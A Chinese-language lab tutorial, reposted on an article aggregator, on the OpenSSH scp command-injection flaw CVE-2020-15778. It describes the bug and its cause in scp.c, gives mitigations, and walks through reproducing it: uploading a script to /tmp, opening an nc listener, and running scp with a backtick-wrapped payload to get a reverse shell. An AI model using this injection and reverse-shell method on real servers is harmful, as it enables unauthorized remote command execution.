CVE-2020-15778 OpenSSH命令注入漏洞

这篇具有很好参考价值的文章主要介绍了CVE-2020-15778 OpenSSH命令注入漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

预备知识
漏洞描述

OpenSSH8.3p1及之前版本中scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。

OpenSSH简介

OpenSSH是 SSH(Secure SHell) 协议的免费开源实现。SSH协议族可以用来进行远程控制,或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、rcpftp、rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。

scp命令简介

scp 是安全拷贝协议(Secure Copy Protocol)的缩写,和众多Linux/Unix 使用者所熟知的拷贝(cp)命令一样。scp的使用方式类似于cp 命令,cp命令将一个文件或文件夹从本地操作系统的一个位置(源)拷贝到目标位置(目的),而scp用来将文件或文件夹从网络上的一个主机拷贝到另一个主机当中去。

scp一些基本参数如下:

-B 采取批量模式(避免询问密码或口令)

-C 启用压缩,通过指明-C参数来开启压缩模式。

-c 加密方式,选择在传输过程中用来加密的加密方式 这个选项会被直接传递到ssh。

-F ssh配置,给ssh指定一个用来替代默认配置的配置文件。这个选项会被直接传递到ssh。

-l 限速,限制命令使用的带宽,默认单位是 Kbit/s。

-P 端口,指定需要的连接的远程主机的端口。

注意,这个选项使用的是一个大写的“P”,因为小写的“-p”已经用来保留目标文件的时间和模式相关信息。(ssh命令中使用小写的“-p”来指定目标端口。)

-p 保留文件原来的修改时间,访问时间以及权限模式。

-q 静默模式:不显示来自ssh命令的进度信息,警告和诊断信息。

-r 递归拷贝整个目录。

注意,scp 命令在树形遍历的时候同样会跟随符号连接,复制所连接的文件。

-v 详细模式。scp和ssh将会打印出处理过程中的调试信息。这可以帮助你调试连接、认证和配置方面的问题。

实验目的
scp是secure copy的缩写。在linux系统中,scp用于linux之间复制文件和目录,基于ssh登陆进行安全的远程文件拷贝命令。该命令由openssh的scp.c及其他相关代码实现,通过这次实验你将了解到通过scp进行反弹shell的操作。

实验环境
目标机器:CentOS、IP:10.1.1.200

攻击机器:Kali

实验步骤一
确定目标机器是否存在漏洞,测试ssh与scp的使用情况。


1、目标机器查看ssh版本,是否在OpenSSH 8.3p1及之前
CVE-2020-15778 OpenSSH命令注入漏洞
在OpenSSH8.3p1及之前说明存在操作系统命令注入漏洞。

2、攻击机器测试ssh与scp的使用情况:

CVE-2020-15778 OpenSSH命令注入漏洞
1.txt中为测试内容,这里显示可以使用:
ssh密码:pA2sw0rb

实验步骤二
使用scp进行反弹shell的操作


首先在攻击机上创建一个linux的可执行的文件,并写入一个反弹shell的命令
CVE-2020-15778 OpenSSH命令注入漏洞                                                      
使用scp命令,把该文件上传到目标机器的/tmp下,在tmp录下任何用户都是拥有读、写、执行的权限
scp RAI.sh root@10.1.1.200:/tmp/RAI.sh
CVE-2020-15778 OpenSSH命令注入漏洞
在kali上开启监听

nc -vv -lvvp 5555
CVE-2020-15778 OpenSSH命令注入漏洞
使用poc远程执行命令

scp zm.sh root@目标地址:'`sh /tmp/zm.sh`'
CVE-2020-15778 OpenSSH命令注入漏洞
可以看到我们的shell已经弹回来了
CVE-2020-15778 OpenSSH命令注入漏洞
实验步骤三
简述漏洞原理


使用scp复制文件到远程服务器时,在scp命令后面跟上文件的路径,具体格式如下:

scp Filename user@host:directory/Filename

在上述过程中,scp会使用”-t“参数来获取存储传入文件的路径,如下:

scp -t directory/Filename
CVE-2020-15778 OpenSSH命令注入漏洞
问题就存在这个地方,也就是如图"scp.c"文件的991行。这个地方未对传入的文件路径进行检测防护,攻击者可以使用反引号包裹payload然后加上文件名执行scp命令,这时payload将会发送到远程服务器并执行。

修复方案
目前厂商暂未发布修复措施解决此安全问题,等待官方补丁 https://www.openssh.com/

临时修复方案:

1、 加强ssh密码或密钥的保护,周期性更换密码或密钥
2、 使用rsync代替scp

具体实践:

CVE-2020-15778 OpenSSH命令注入漏洞

CVE-2020-15778 OpenSSH命令注入漏洞 CVE-2020-15778 OpenSSH命令注入漏洞

CVE-2020-15778 OpenSSH命令注入漏洞

CVE-2020-15778 OpenSSH命令注入漏洞

 CVE-2020-15778 OpenSSH命令注入漏洞文章来源地址https://www.toymoban.com/news/detail-490993.html

到了这里,关于CVE-2020-15778 OpenSSH命令注入漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190)

    目录 漏洞概述 受到影响的产品和版本 漏洞复现 1、搭建靶场 2、攻击复现 一、执行系统程序 二、执行系统命令 修复 Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具(Windows上的微软支持诊断工具中存在此漏洞)。当从Word等

    2024年02月06日
    浏览(28)
  • 安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析

    代码安全扫描阶段,前端资源审计发现 jQuery 版本过低导致生产系统存在 CVE-2020-11022/CVE-2020-11023 类风险。且影响范围: jQuery = 1.0.3 3.5.0 。 该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄

    2024年02月05日
    浏览(32)
  • Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883

    Weblogic未授权访问漏洞-CVE-2020-14882CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)。 CVE-2020-14882:允许未授权的用户绕过管理控制台的权限验证访问后台 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令 使用这两个漏洞组成的利用链,可通

    2024年02月16日
    浏览(28)
  • Log4j反序列化命令执行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

    Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境:vulhub 工具下载地址: ysoserial 利用工具生成payload: 1.创建文件 进入容器内部,查看文件创建成功 2.查看反弹的shell 有点

    2024年02月11日
    浏览(40)
  • jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023

    漏洞号: CVE-2020-11022 / CVE-2020-11023 影响范围:jQuery = 1.0.3 3.5.0 漏洞原理 见:jQuery最新xss漏洞分析——CVE-2020-11022/11023 - 云+社区 - 腾讯云 (tencent.com) 漏洞复现 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 要想在项目本地实现,可把该html保存下来,修改script的src属性为项目引用j

    2023年04月26日
    浏览(32)
  • 漏洞修复--OpenSSH权限提升漏洞(CVE-2021-41617)

    官方已发布安全版本修复漏洞,腾讯安全专家建议受影响的用户请尽快更新至安全版本。 安全版本:OpenSSH 8.8 用户可根据所使用的发行版本,升级修复。 查看OpenSSH版本:rpm -qa | grep openssh 升级OpenSSL版本:yum -y install openssh centos7 用户,建议升级到如下版本:openssh-7.4p1-22.el7

    2024年02月15日
    浏览(31)
  • 记一次修复漏洞(OpenSSH 安全漏洞(CVE-2023-28531))CentOS升级openssh

    1.查看当前openssl和openssh版本 2.安装并启用telnet服务(防止升级过程无法连接机器) 设置开机自启 启动服务 检查服务是否开启: 开启root用户在telnet登陆:   3.配置防火墙(关闭防火墙可不配置) 法一:直接对外开发23端口(高风险)  #--permanent 为永久开启,不加此参数重启

    2024年02月06日
    浏览(37)
  • CVE-2020-14882&14883漏洞复现

    漏洞介绍   在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14882。 CVE-2020-14882 允许远程用户规避控制台组件中的身份验证。导致此漏洞的原因是服务器 URL 的路径遍历黑名单配置不当,可以在 WebLogic HTTP 访问的处理

    2023年04月24日
    浏览(29)
  • Openssh高危漏洞CVE-2023-38408修复方案

    2023年07月21日,360CERT监测发现 OpenSSH 发布了 OpenSSH 的风险通告,漏洞编号为 CVE-2023-38408 ,漏洞等级: 高危 ,漏洞评分: 8.1 。 OpenSSH 是 Secure Shell (SSH) 协议的开源实现,提供一套全面的服务,以促进客户端-服 务器环境中不安全网络上的加密通信。 威胁等级 高 影响面 广泛

    2024年02月11日
    浏览(36)
  • Tomcat文件包含漏洞(CVE-2020-1938)

    注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!! 漏洞介绍 Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 Ghostcat(幽灵猫) 是由长亭科技安

    2024年02月05日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包